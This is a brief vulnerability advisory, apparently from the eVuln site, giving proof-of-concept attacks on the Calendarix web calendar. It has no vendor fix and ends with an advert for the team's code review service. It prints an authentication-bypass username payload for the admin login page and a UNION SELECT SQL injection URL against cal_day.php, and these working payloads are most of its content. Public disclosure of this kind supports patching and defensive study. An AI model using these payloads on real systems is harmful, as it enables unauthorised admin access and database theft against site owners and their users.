PoC/Exploit for SQL Injection and Authentication Bypass in Calendarix

Published Proof of Concept code - SQL Injection and Authentication Bypass in Calendarix.

Description
Available
Solution
Not available - check vendor's website

1. Authentication Bypass

Link: http://host/calendarix/admin/cal_login.php

username: ' or 1/*

password: any

2. SQL-Injection Example

http://host/calendarix/cal_day.php?op=day&date=2006-01-10&catview=99%20union%20select%2012345

Order Source Code Review made by eVuln team

Protect your website or web application by source code review of a site done by our team.The work will be done by experts in website security.

Advisories by vuln type